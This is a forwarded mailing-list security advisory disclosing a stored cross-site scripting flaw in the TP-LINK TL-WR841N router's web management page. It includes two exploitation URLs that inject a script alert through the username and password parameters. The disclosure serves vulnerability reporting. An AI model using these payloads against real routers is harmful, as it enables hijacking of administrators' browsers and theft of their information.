FW: =| Security Advisory - TP-LINK TL-WR841N XSS (Cross Site Scripting) |=

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



=| Security Advisory - TP-LINK TL-WR841N XSS (Cross Site Scripting) |=

Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n and Below
Discovered Date: 17/11/2012
Author: Matan Azugi [matan@xxxxxxxxxxxx]
Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N 

Details:

TP-LINK TL-WR841N Wireless Router is prone to Cross Site Scripting
Vulnerability.
The vulnerability exists in Web-Based Management.
Remote authenticated administrators may inject arbitrary JavaScript or HTML
via the username parameter or via pwd parameter to exploit Stored Cross Site
Scripting condition.  
Exploitation URL: 

1.
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script
><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save
2.
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a123
4</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save

Successful exploitation allows the attacker to steal user information and
may allow the attacker to take full control over the user Browser.






[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux